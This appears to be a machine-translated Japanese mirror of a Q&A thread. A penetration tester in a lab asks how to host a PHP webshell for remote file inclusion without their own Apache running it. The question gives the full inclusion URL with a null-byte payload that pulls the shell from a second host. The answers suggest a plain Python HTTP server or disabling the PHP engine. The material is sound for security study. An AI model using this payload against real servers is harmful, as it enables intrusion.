web-dev-qa-db-ja.com

ローカルで実行せずにphp webshel​​lを提供する

私は侵入テストラボでKali Linuxを使用しています。

被害者のシステムに次のURLを入力すると、Apacheサーバーにアクセスできます(ログに200アクセス応答が表示されます)が、phpファイルがシステムにレンダリングされ、自分のボックスにWebshel​​lが生成されます。

https://10.0.0.1/section.php?page=http://10.0.0.2/phpshell.php%00

Apacheで「バインディングを変更する」 実行されないようにするにはどうすればよいですか? .txtに変更すると、bothシステムで実行できなくなるようです。 そのように挿入する できるかどうかわからない。

7
Shrout1

python -m SimpleHTTPServer 80

pHPに対応していない単純なhttpサーバーを起動します。最も速い方法はimhoです。

5
Sebastian B.

Apache構成または.htaccessファイルで次の設定を使用します。

php_flag engine off

Disable PHP in directory(in all sub-directories)with .htaccess も参照してください。

7
Sjoerd